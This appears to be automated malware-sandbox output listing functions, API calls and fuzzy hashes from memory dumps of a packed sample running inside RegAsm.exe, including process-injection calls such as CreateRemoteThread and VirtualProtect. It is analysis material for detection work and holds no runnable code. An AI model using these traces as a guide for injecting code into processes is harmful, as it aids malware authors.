Source File: 00000007.00000002.2691661296.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1550000_crypted.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: eb4701beb8eeb8530fbd2c9ca16a7c27d9944e160fbe0bff01453691d176308f
Instruction ID: 9db007ec280ec100a64c9f8d4b31289892797a1cfc32876fdc3acadc66924cf0
Opcode Fuzzy Hash: eb4701beb8eeb8530fbd2c9ca16a7c27d9944e160fbe0bff01453691d176308f
Instruction Fuzzy Hash: 5E31E2B5A01249DFCB10CF99D984ADEBFF5FF48310F10842AE919A7250C375A950CFA4

Function 015504F8 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03FC3594,?,?,?), ref: 01550FB9

Memory Dump Source

Source File: 00000007.00000002.2691661296.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1550000_crypted.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c7280010927b7294050a17c7aac56c858cdd63633cd5e3a5b6e7a3d5f5f335a5
Instruction ID: fea2b81bfc11112ba4c119a430d90ae651975b01b82cedc239764571920908f9
Opcode Fuzzy Hash: c7280010927b7294050a17c7aac56c858cdd63633cd5e3a5b6e7a3d5f5f335a5
Instruction Fuzzy Hash: E621F2B5905619AFCB00DF9AC884ADEFBB4FF49310F10812AE918A7340C374A954CFE1

Analysis Process: RegAsm.exePID: 5144, Parent PID: 5328COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.2%
Total number of Nodes:	96
Total number of Limit Nodes:	10

Executed Functions

Function 0666EF40 Relevance: 8.3, Strings: 6, Instructions: 778
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0666F01E
(aq, xrefs: 0666F498
(aq, xrefs: 0666EFD0
0o@p, xrefs: 0666F82D
Lj@p, xrefs: 0666F9CE
Dq@p, xrefs: 0666F839

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID: (aq$(aq$(aq$0o@p$Dq@p$Lj@p
API String ID: 0-3521037203
Opcode ID: cc1fe10f47ef971cd63262387bff6bff95b8245266fdff50d0fc7f27af3ce776
Instruction ID: 7a89022183ebfe587c7d9ef1972cb235027f1062d778862d6181c8b195557211
Opcode Fuzzy Hash: cc1fe10f47ef971cd63262387bff6bff95b8245266fdff50d0fc7f27af3ce776
Instruction Fuzzy Hash: F1622975A002049FCB54DF69E494AAEBBF6FF89310F1581A9E805DB365CB31ED42CB90

Function 066A8E01 Relevance: 5.3, Strings: 4, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 066A905B
$]q, xrefs: 066A8FC1
$]q, xrefs: 066A9071
$]q, xrefs: 066A8FAB

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 9eeeb3c80594e0c12efd80b564b2642267d0e6020826ef5a31e85e94f8eb7597
Instruction ID: d701eaf43705e65f7be8863a2f6e4c2ab0c0a94335ca969dd8c6b90566bd5204
Opcode Fuzzy Hash: 9eeeb3c80594e0c12efd80b564b2642267d0e6020826ef5a31e85e94f8eb7597
Instruction Fuzzy Hash: 0BC1D670E00219CFDB58DFA5C990B9EBBB2BF89300F608169D40AAB355DB345D86CF51

Function 0666C588 Relevance: 3.2, Strings: 2, Instructions: 692
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0666CE4E
(aq, xrefs: 0666CE8A

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID: (aq$(aq
API String ID: 0-3916115647
Opcode ID: 66c59a504e4cbe9d16ee9583e31c4a039344744e8b02b2f634fe00edcc9cfbae
Instruction ID: aca900d16ca15fbe7296d32b85e372b3fd86be21700471311e48f101233b0193
Opcode Fuzzy Hash: 66c59a504e4cbe9d16ee9583e31c4a039344744e8b02b2f634fe00edcc9cfbae
Instruction Fuzzy Hash: A3529C30B006058FDB54DF79D854B6ABBF2AF89300F1581A9E44AEB396DB34DD85CB90

Function 063C3F50 Relevance: 1.8, Strings: 1, Instructions: 526COMMON

Download Yara Rule

Strings

$]q, xrefs: 063C41E4

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 37dbad89255d92fb72606464cda2f5deda6d574bda7606da9eb41eac4785f92b
Instruction ID: 83f36777591608a00b7ab5764d9096a8fa7ca0db5a0de2e0c7f99265a6ceaafc
Opcode Fuzzy Hash: 37dbad89255d92fb72606464cda2f5deda6d574bda7606da9eb41eac4785f92b
Instruction Fuzzy Hash: B8126F34B002158FCB54DF68C994A6EBBF6BF89710B15816EE906EB366DB31DC05CB90

Function 066A3EE0 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 066A3F45

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe643c1eea2c1b9e78e5fe674d91b9b89aec6c9146d73e223bf6643dbb7a2534
Instruction ID: 7dd210299534227a7819bd29c9fb9c180dafe0ac2812f17067ea6081589c0792
Opcode Fuzzy Hash: fe643c1eea2c1b9e78e5fe674d91b9b89aec6c9146d73e223bf6643dbb7a2534
Instruction Fuzzy Hash: D3219D75E11218DFCB48DFA9E584ADDBBB2EB89321F10912AE415B7360DB305881CF64

Function 066ACE10 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

$]q, xrefs: 066ACFC4

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: b0a62637507202ce74956fd30f37a138b0865e7c26d99441e76ca9d0d6245954
Instruction ID: d100c1f895beef3167913a8dcaa3c225fc7a6ec7f20b85b51c2e2c05815be90a
Opcode Fuzzy Hash: b0a62637507202ce74956fd30f37a138b0865e7c26d99441e76ca9d0d6245954
Instruction Fuzzy Hash: 0E71D274E01308DFDB58DFA5D984AADBBB2BF89304F209529E415AB354DB349C42CF84

Function 063C67D8 Relevance: .4, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7f30e1c92b93675a953764f81d80e78c6c754aa06590eae421acd9a0800fcb
Instruction ID: 000182bc50bc06ac2e1cd1b69baa4cb5cad7fe174952e6dc4f6c0f789ef734df
Opcode Fuzzy Hash: 4a7f30e1c92b93675a953764f81d80e78c6c754aa06590eae421acd9a0800fcb
Instruction Fuzzy Hash: 14F1B230A002059FCB55DF68D981B9EBBF6EF89310F148569F505DB2A2DB34ED49CBA0

Function 06660A0C Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6140e92c578514f14b88f9588ad12d329f8dd8af587e99dbd80506fa84c632e
Instruction ID: cf6f63cbd1921fdde27cad5513c3e0d038053acaddf50d26e05b1cc0e01e2ca7
Opcode Fuzzy Hash: c6140e92c578514f14b88f9588ad12d329f8dd8af587e99dbd80506fa84c632e
Instruction Fuzzy Hash: 55D17E71A0020A9FCB44DF79D884AAEBBF2FF89300B158569E405E7365DB30EC41CBA1

Function 063CA688 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac81b08c4756335927b913c599fd1c813743d540f44e82d1d94d3ea923a6c17
Instruction ID: 8393f6b93c5ace7b9ad7b8c0b758e2227d78d4b8eba37e8e514bc1ea94fa23e5
Opcode Fuzzy Hash: cac81b08c4756335927b913c599fd1c813743d540f44e82d1d94d3ea923a6c17
Instruction Fuzzy Hash: 85D12B34D00218CFCB18EFB8D994A9DBBB2FF8A305F109169E50AAB394DB355985CF51

Function 063A0D80 Relevance: 20.6, Strings: 16, Instructions: 617
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 063A13EB
$]q, xrefs: 063A0E02
$]q, xrefs: 063A0E84
$]q, xrefs: 063A0E78
$]q, xrefs: 063A1430
$]q, xrefs: 063A0FAC
$]q, xrefs: 063A13AC
$]q, xrefs: 063A137B
$]q, xrefs: 063A13A0
$]q, xrefs: 063A0E52
$]q, xrefs: 063A0FB8
$]q, xrefs: 063A1455
$]q, xrefs: 063A1461
$]q, xrefs: 063A0F86
$]q, xrefs: 063A0F36
$]q, xrefs: 063A1336

Memory Dump Source

Source File: 00000009.00000002.2850443756.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63a0000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2551331179
Opcode ID: 09df58e5f1d71ad1f6fcbec246192d1e0a0e5b946f930d15a3160ca46ab6ed11
Instruction ID: 0c8ab76ede262ddb91c864fde61e3f499ab45614a69160024e71e1f2d1bb859c
Opcode Fuzzy Hash: 09df58e5f1d71ad1f6fcbec246192d1e0a0e5b946f930d15a3160ca46ab6ed11
Instruction Fuzzy Hash: 1E22BD30B002048FDB499B69C954A7EBBFAFF89304F14845AE506CB3A6CB35DC05DBA1

Function 063A1514 Relevance: 10.5, Strings: 8, Instructions: 529
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 063A13EB
$]q, xrefs: 063A1A88
$]q, xrefs: 063A18E3
$]q, xrefs: 063A182E
$]q, xrefs: 063A1336
$]q, xrefs: 063A1A7C
$]q, xrefs: 063A1A12
$]q, xrefs: 063A1A57

Memory Dump Source

Source File: 00000009.00000002.2850443756.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63a0000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: e53742aeea4e0a4ccf0b4d5e8c0e2bf4b763b21252fb842bdcfc3069af337eaf
Instruction ID: 39e562e95e69a700d1ef52ac10cb1c89319fa242dcadd6a85c203d37013f3d3e
Opcode Fuzzy Hash: e53742aeea4e0a4ccf0b4d5e8c0e2bf4b763b21252fb842bdcfc3069af337eaf
Instruction Fuzzy Hash: 2A12DF34B003019FDB849FA8C894A7A7BEBEF99704F148569E9028B3A5CF75DC05D7A1

Function 00E1D0A8 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E1D136
GetCurrentThread.KERNEL32 ref: 00E1D173
GetCurrentProcess.KERNEL32 ref: 00E1D1B0
GetCurrentThreadId.KERNEL32 ref: 00E1D209

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: feb800709078a7d794649705c7b886b1d7c3bd195a072b1fc3c94616423169c5
Instruction ID: 6de093666cfbe5571f1380d0dcb61a87c7d9251d2fdbf821d990bb047cba5abb
Opcode Fuzzy Hash: feb800709078a7d794649705c7b886b1d7c3bd195a072b1fc3c94616423169c5
Instruction Fuzzy Hash: 92517BB09013499FDB54DFAAD9487DEBBF1EF49304F208459E019A7360DB389885CB65

Function 00E1D0B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E1D136
GetCurrentThread.KERNEL32 ref: 00E1D173
GetCurrentProcess.KERNEL32 ref: 00E1D1B0
GetCurrentThreadId.KERNEL32 ref: 00E1D209

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b5f9cbb49fc5a2942ac1d5eb0d32a6921a124285cc676e3164889f687df0ee1e
Instruction ID: 20df96780e0354e41cec3d35ea0a4a80ac537d5e7af7aea9246b7d578bd52d5f
Opcode Fuzzy Hash: b5f9cbb49fc5a2942ac1d5eb0d32a6921a124285cc676e3164889f687df0ee1e
Instruction Fuzzy Hash: 3A5158B09013099FDB14DFAAD948BDEBBF1EF89314F208459E019B7360DB789984CB65

Function 0666FB40 Relevance: 2.7, Strings: 2, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0666FCA2
(aq, xrefs: 0666FC54

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID: (aq$(aq
API String ID: 0-3916115647
Opcode ID: 2ab1cd4e7bc1cc7d5d3581f345fd4e20eeecca628d60ab18d7aa49cb985fe1b1
Instruction ID: 3512b6a2a55433f197ac7442662f031895f2b295865e6dddde40af24230d1db8
Opcode Fuzzy Hash: 2ab1cd4e7bc1cc7d5d3581f345fd4e20eeecca628d60ab18d7aa49cb985fe1b1
Instruction Fuzzy Hash: 278192757002118FCB599F69E854A6E7BF7EFC9700B158069E906CB3A6DE34DD02CBA0

Function 066634F8 Relevance: 2.7, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 066637DA
(aq, xrefs: 06663784

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID: (aq$(aq
API String ID: 0-3916115647
Opcode ID: f4425c6eedc2b153f8b5fd57b025dd585afe168c6a1bead58080da6d24faa483
Instruction ID: 1613b452f97cdf26d20b8d75dea4ef3811775cc2eeec8611d39743a9a16421a4
Opcode Fuzzy Hash: f4425c6eedc2b153f8b5fd57b025dd585afe168c6a1bead58080da6d24faa483
Instruction Fuzzy Hash: DF51F570B002458FCB55EF6A985466FBBA2FFC6300B508069E906DB386DE30DD46C7E1

Function 06663A08 Relevance: 2.7, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 06663C94
(aq, xrefs: 06663CEA

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID: (aq$(aq
API String ID: 0-3916115647
Opcode ID: b4c4a22eabbb76286e0bac4d51c4e5dd6c82ef422715f1fef94a35eca050beb7
Instruction ID: b95e86b995a4f556b5c224597c312966db26529e246bbc8eece11a85bd2a00dc
Opcode Fuzzy Hash: b4c4a22eabbb76286e0bac4d51c4e5dd6c82ef422715f1fef94a35eca050beb7
Instruction Fuzzy Hash: 9A51F530B002559FCB59AF6E989462EBBA2FFC6300B508169E906DB386DE30DD45C7E1

Function 063C8C78 Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

(aq, xrefs: 063C8D00
(aq, xrefs: 063C8D2C

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID: (aq$(aq
API String ID: 0-3916115647
Opcode ID: 30a6162843540edb8fee9f44d6d0658042f5b10e2f6b238fcbb99fa97b18fc7b
Instruction ID: 690388481d81159eed45e31a875460fd3007e361db7c917a66d6d7940f83d77c
Opcode Fuzzy Hash: 30a6162843540edb8fee9f44d6d0658042f5b10e2f6b238fcbb99fa97b18fc7b
Instruction Fuzzy Hash: 4241153170829A5FCB465F7894146AF3FA3AFD6260B14805AF845DB392CE348D06C7A2

Function 063A0598 Relevance: 1.7, Strings: 1, Instructions: 462COMMON

Download Yara Rule

Strings

qlPj, xrefs: 063A059C

Memory Dump Source

Source File: 00000009.00000002.2850443756.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63a0000_RegAsm.jbxd

Similarity

API ID:
String ID: qlPj
API String ID: 0-2765553587
Opcode ID: 5305153bdfc7a4d972e794d1649427baa75d9726a0066b4922ac36433f12e5e4
Instruction ID: 52bf7bae9a06d664266e138644bf781cc6f0946830e3fd28965dde15ad9dadb2
Opcode Fuzzy Hash: 5305153bdfc7a4d972e794d1649427baa75d9726a0066b4922ac36433f12e5e4
Instruction Fuzzy Hash: 27029B347403048FDB599F74C954A6A7BB6FF89708F004958E5028B7A2CF7AED09CB96

Function 00E1AE30 Relevance: 1.7, APIs: 1, Instructions: 209COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B086

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 50830bb69c215a50608fa892e021fd7dd816019b2f179ac49ef6587431c8a062
Instruction ID: 78d52d5ae6dedd3ebc6ea72521fc4b8c577ec780570c33757c64d8ee34ce3e0d
Opcode Fuzzy Hash: 50830bb69c215a50608fa892e021fd7dd816019b2f179ac49ef6587431c8a062
Instruction Fuzzy Hash: AB817AB0A01B058FDB24DF29D1457AABBF1FF88304F04892DD44AE7A51D735E986CB91

Function 066A3D02 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 066A3E58

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: eb3085d648f25a18d01b16ef25d345b4a34b47599a4beceeeb722e70cce78547
Instruction ID: e3b9c1680c516a0548601086eab52f8282521937941c735f19fe1ae57b3e040b
Opcode Fuzzy Hash: eb3085d648f25a18d01b16ef25d345b4a34b47599a4beceeeb722e70cce78547
Instruction Fuzzy Hash: F2510674E01208DFDB54EFA5E9406EDBBB2BF88304F10852AE406BB354DB349942CF80

Function 00E15935 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E159F1

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0dfda38e369b795b0d3f9d67b0d346f39c350ecb2ea8e6d12abd44d5f56a8b64
Instruction ID: b0079431a6887c315f82601a47d1bb08f049fd2b33b4f902faa5a8bf18623254
Opcode Fuzzy Hash: 0dfda38e369b795b0d3f9d67b0d346f39c350ecb2ea8e6d12abd44d5f56a8b64
Instruction Fuzzy Hash: 7541CFB1C00719CEDB24CFA9C884BDDBBB5BF84704F20815AD418BB254DB755986CF91

Function 00E14248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E159F1

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 83595227ae51d7452c061fb3a576434b0f97c950a76b8de6cdd8870bd98408da
Instruction ID: c7d327ec87f7cbd900905e810826227a390d02188fc4ac018f728f26a8ecc09b
Opcode Fuzzy Hash: 83595227ae51d7452c061fb3a576434b0f97c950a76b8de6cdd8870bd98408da
Instruction Fuzzy Hash: E641E2B1C00619CADB24CFA9C844BDDBBF5FF84704F20815AD418BB250DB756985CF91

Function 00E1D2F9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E1D387

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a9f74ec3bfb8d23d3bc46367bf871e5966cc2edaf9a4dff46a530898eb6037e3
Instruction ID: 4c5e4bb2aca7c39c5f5032f0d7a575385ead54417c68e27afb33eaed0cf20c9d
Opcode Fuzzy Hash: a9f74ec3bfb8d23d3bc46367bf871e5966cc2edaf9a4dff46a530898eb6037e3
Instruction Fuzzy Hash: 2821E3B59002489FDB10CFAAD985AEEFFF5EB48314F14841AE958B3210C378A955CFA1

Function 00E1D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E1D387

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c1b2c89e391fa5a68a803fc235f5ab10595334e24654cba3d7bf4fd61dd5b78b
Instruction ID: bd3938553a7f0d62df2660a187d6c30f40363a23afbb0435d99c2d0e12b99d52
Opcode Fuzzy Hash: c1b2c89e391fa5a68a803fc235f5ab10595334e24654cba3d7bf4fd61dd5b78b
Instruction Fuzzy Hash: FD21C4B59002489FDB10CF9AD985ADEFBF4EB48710F14841AE918A3310D378A954CFA5

Function 063C59C8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

d, xrefs: 063C5C29

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 43f6a148bd3111df51f41a66bbbc74b7d4b074a80811c190717b6d0eb4c8a85c
Instruction ID: 025ba448cdf87fd872c8971ee335ef8bea4d26717d82a8925826b7439854019f
Opcode Fuzzy Hash: 43f6a148bd3111df51f41a66bbbc74b7d4b074a80811c190717b6d0eb4c8a85c
Instruction Fuzzy Hash: F9C15B35A00602CFC754CF18C58096ABBF2FF89320759CA99E45A9B665D730FC56CB90

Function 00E1A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B101,00000800,00000000,00000000), ref: 00E1B312

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 92fea4ec01f65b2c0a9cf60cbe4b187ad523f424755bda5faa96f879dc490a9b
Instruction ID: a06ca0c515a7abc014c17c820b1c7b8c0ed36069a6f4ab60745520dedeffed6e
Opcode Fuzzy Hash: 92fea4ec01f65b2c0a9cf60cbe4b187ad523f424755bda5faa96f879dc490a9b
Instruction Fuzzy Hash: 2C1103B6C002498FCB10CF9AC444ADEFBF4EB48710F10842AE529B7210C3B8A985CFA5

Function 00E1B2A0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B101,00000800,00000000,00000000), ref: 00E1B312

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ce9823c2156ca9afb6ce1636be0d06d2e38b72e5721ff0c922a5441c69955083
Instruction ID: c265012a7a99db6a6b3ca329f12a3d7237177b290ee269fdf2a985a18a5e248d
Opcode Fuzzy Hash: ce9823c2156ca9afb6ce1636be0d06d2e38b72e5721ff0c922a5441c69955083
Instruction Fuzzy Hash: 4D11E4B69002498FDB10CF9AD444ADEFBF4EB48714F14841ED969B7210C7B9A585CFA1

Function 066A3B28 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 066A3B9E

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID: KeyboardLayout
String ID:
API String ID: 194098044-0
Opcode ID: ca7edb0f809d5e8bbb1d386c458e277080374830672d196b339fc5d414315ee4
Instruction ID: 87ef6d99059f75b34d015451079f1e3f447e46cf4d1b763068539263b0efcd68
Opcode Fuzzy Hash: ca7edb0f809d5e8bbb1d386c458e277080374830672d196b339fc5d414315ee4
Instruction Fuzzy Hash: 211153B5D013489ECB509FA9C909ADEBFF0AB09210F24845AD419B7340C639A944CFA5

Function 00E1B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B086

Memory Dump Source

Source File: 00000009.00000002.2841803905.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e10000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d210c3fb686ae92418360aa79a5abc2190d9055e3adf8d6110c1cbaaff320ed2
Instruction ID: 511b33ad280898cc244c586cc0235b25717f1fc51b9980b8ebedff03b52b038f
Opcode Fuzzy Hash: d210c3fb686ae92418360aa79a5abc2190d9055e3adf8d6110c1cbaaff320ed2
